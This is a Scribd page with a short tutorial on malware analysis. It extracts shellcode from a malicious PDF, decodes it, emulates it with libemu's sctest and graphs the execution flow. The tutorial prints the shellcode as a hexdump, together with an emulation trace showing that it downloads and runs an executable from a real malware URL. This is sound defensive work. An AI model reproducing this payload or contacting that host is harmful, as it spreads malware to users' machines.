Scribd
Upload
3K views

Libemu and Extracting Shellcodes From PDF Malware

The document describes using libemu to extract shellcode from a PDF malware sample and generate a flow graph visualization of the shellcode execution. Key steps include using Pyew to extract the shellcode, filtering it with Perl, executing it with libemu's sctest to see the system calls, and generating a Graphviz DOT file to create a PNG flow graph image.

Uploaded by

najmizabidi
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as PDF, TXT or read online on Scribd
3K views

Libemu and Extracting Shellcodes From PDF Malware

The document describes using libemu to extract shellcode from a PDF malware sample and generate a flow graph visualization of the shellcode execution. Key steps include using Pyew to extract the shellcode, filtering it with Perl, executing it with libemu's sctest to see the system calls, and generating a Graphviz DOT file to create a PNG flow graph image.

Uploaded by

najmizabidi
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 7

Using libemu to create malware flow graph

Muhammad Najmi Ahmad Zabidi


[email protected]

Abstract
In this paper basically I just document my personal experience, that
is the process of extracting shellcodes from PDF malware and later put it
into Graphviz’s picture. I adapt most the examples are from the tutorial
given by [Jeremy, 2008].

1 Introduction
In this write up I will show to you on how to extract shellcodes from PDF files.

2 PDF malware
Malicious PDF contains embedded Javascript (*.js). This Javascript may does
harmful activity without the user’s consent.

3 Steps to extract shellcodes


3.1 Tools of trade
What we need to do basically use the existing tool. As of now I suggest you to
download the following tools:

• http://code.google.com/p/pyew/
• http://libemu.carnivore.it/
• http://www.graphviz.org/

3.2 Extracting the shellcode


I used pdf example.py from the pyew package.
 
$ ls pdf_example . py -l
- rwxr - xr - x 1 najmi najmi 1497 2010 -03 -30 20:03 pdf_example . py
 
Given that I have a PDF malware fetched from the wild:

∗ Thanks to my wife, for providing hot coffee!

1
 
$ avgscan b c 6 6 f d 9 e 0 c 2 f 7 a 7 9 1 6 7 d a b 1 6 5 3 1 c 2 8 f 2
AVG command line Anti - Virus scanner
Copyright ( c ) 2009 AVG Technologies CZ

Virus database version : 271.1.1/2834


Virus database release date : Sun , 25 Apr 2010 14:31:00 +08:00

bc66fd9e0c2f7a79167dab16531c28f2 Virus found Script / Exploit

Files scanned : 1(1)


Infections found : 1(1)
PUPs found : 0
Files healed : 0
Warnings reported : 0
Errors reported : 0
 
By using the said tool in Section 3.1 above, I manually took the intended
garbled shellcodes, which contains the following shellcodes:

Figure 1: PDF shellcodes in Pyew tool


Now let us see the strings. Take out the following strings in between the
unescape() brakets, and save it somewhere in a texeditor.

2
Figure 2: PDF shellcodes (Zoom mode)
Now, we need to filter out the unintended strings, simply cut out using the
following perl script:

cat shell . txt | perl - pe ’s /\% u (..)(..)/ chr ( hex ( $2 )). chr ( hex ( $1 ))/ ge ’ > filtered - shell . txt

Now, you should get the intended shellcodes. You actually can see a plain
URL within that PDF shellcodes. Say, by using hexdump tool:

$hexdump -C filtered - shell . txt

00000000 90 90 90 90 90 90 eb 0f 5b 33 c9 66 b9 80 01 80 |........[3. f ....|


00000010 33 11 43 e2 fa eb 05 e8 ec ff ff ff 81 75 b0 21 |3. C .......... u .!|
00000020 11 11 11 9a 51 1d 9a 61 0d bc 9a 61 19 90 fd 11 |.... Q .. a ... a ....|
00000030 15 11 11 9a fd 47 79 9f 5f 1f fd f9 ef 11 11 11 |..... Gy . _ .......|
00000040 98 54 15 47 79 89 ef 9b 1f f9 e1 11 11 11 98 54 |. T . Gy .......... T |
00000050 19 47 79 34 a1 ee d3 f9 f3 11 11 11 98 54 1d 47 |. Gy4 ......... T . G |
00000060 79 fe df f1 71 f9 c5 11 11 11 98 54 01 47 79 d0 | y ... q ...... T . Gy .|
00000070 68 f4 a9 f9 d7 11 11 11 98 54 05 51 91 29 d2 64 | h ........ T . Q .). d |
00000080 eb 98 54 09 f8 16 10 11 11 4f 98 64 35 9a 54 15 |.. T ...... O . d5 . T .|
00000090 7b 10 48 9a 44 09 47 f9 9a 11 11 11 41 79 27 0b |{. H . D . G ..... Ay ’.|
000000 a0 3e 61 f9 86 11 11 11 98 54 0d 9a d4 92 d1 41 98 | > a ...... T ..... A .|
000000 b0 54 31 79 ee 11 11 11 41 9a 54 05 7b 13 48 9a 44 | T1y .... A . T .{. H . D |
000000 c0 09 f9 70 11 11 11 12 54 31 d6 11 4d 6f 3f 74 d6 |.. p .... T1 .. Mo ? t .|
000000 d0 51 15 69 74 11 11 ee 64 31 9a 54 1d 7b 10 48 9a | Q . it ... d1 . T .{. H .|
000000 e0 44 09 f9 51 11 11 11 7b 16 49 12 54 35 22 ca 42 | D .. Q ...{. I . T5 ". B |
000000 f0 42 ee 64 31 41 42 9a 54 0d 7b 14 48 9a 44 09 f9 | B . d1AB . T .{. H . D ..|
00000100 32 11 11 11 7b 11 ee 64 31 9a 54 19 7b 13 48 9a |2...{.. d1 . T .{. H .|
00000110 44 09 f9 01 11 11 11 7b ee 9a 54 01 7b 10 48 9a | D ......{.. T .{. H .|
00000120 44 09 f9 11 11 11 11 50 4a 43 12 f0 12 f0 12 f0 | D ...... PJC ......|
00000130 12 f0 92 fd 15 4b 42 9a cb f3 e6 43 ee f1 44 9a |..... KB .... C .. D .|
00000140 fd 9a 6c 19 9a 4c 1d 47 9a 62 2d 9a 65 0f 69 12 |.. l .. L . G .b -. e . i .|
00000150 e2 47 9a 67 31 12 e2 22 d8 58 50 bc 12 d2 47 22 |. G . g1 ..". XP ... G "|
00000160 e7 1e af 01 2b e3 65 19 d0 df 1c 12 e3 51 fa e0 |....+. e ...... Q ..|
00000170 2a ef 4f 64 f4 4b 9a fa 9a 4b 35 12 cc 77 9a 1d |*. Od . K ... K5 .. w ..|
00000180 5a 9a 4b 0d 12 cc 9a 15 9a 12 d4 4f 4c d3 19 11 | Z . K ........ OL ...|
00000190 f9 e5 ef ee ee 44 43 5d 5c 5e 5f 11 68 74 74 70 |..... DC ]\^ _ . http |
000001 a0 3a 2f 2f 62 75 74 65 72 69 6b 2e 63 6f 6d 2f 31 |:// buterik . com /1|
000001 b0 32 33 2f 6c 6f 61 64 2e 65 78 65 00 0a |23/ load . exe ..|

3
Now, we need to call the libemu’s tool called sctest. By using the following
command:
 
sctest - Sgs 1000000 -v < filtered - shell -. txt
 
It will creates the following output:
 
verbose = 1
success offset = 0 x00000017
Hook me Captain Cook !
userhooks . c :132 u s e r _ h o o k _ E x i t T h r e a d
ExitThread ( -1)
stepcount 314316
HMODULE LoadLibraryA (
LPCTSTR lpFileName = 0 x00417195 = >
= " URLMON ";
) = 0 x7df20000 ;
UINT G e t S y s t e m D i r e c t o r y (
LPTSTR lpBuffer = 0 x0012fae8 = >
= " c :\ WINDOWS \ system32 ";
UINT uSize = 255;
) = 19;
ERROR DeleteFile (
LPCTSTR lpFileName = 0 x0012fae8 = >
none ;
) = -1;
HRESULT U R L D o w n l o a d T o F i l e (
LPUNKNOWN pCaller = 0 x00000000 = >
none ;
LPCTSTR szURL = 0 x0041719c = >
= " http :// buterik . com /123/ load . exe ";
LPCTSTR szFileName = 0 x0012fae8 = >
= " c :\ WINDOWS \ system32 \~. exe ";
DWORD dwReserved = 0;
L P B I N D S T A T U S C A L L B A C K lpfnCB = 0;
) = 0;
UINT WINAPI WinExec (
LPCSTR lpCmdLine = 0 x0012fae8 = >
= " c :\ WINDOWS \ system32 \~. exe ";
UINT uCmdShow = 0;
) = 32;
void ExitThread (
DWORD dwExitCode = -1;
) = 0;
 
Now, if you want to create a flow graph, we need to add an extra flag, -G
flag to the tool’s execution.

sctest - Sgs 1000000 -v -G shell . dot < filtered - shell - b c 6 6 f d 9 e 0 c 2 f 7 a 7 9 1 6 7 d a b 1 6 5 3 1 c 2 8 f 2 . txt

Next, execute the dot command (from Graphviz package):


 
dot shell . dot - Tpng -o shell . png
 
This will create a PNG file which contains the following graph:

4
5
6
References
[Jeremy, 2008] Jeremy (2008). http://www.sudosecure.net/archives/313.

You might also like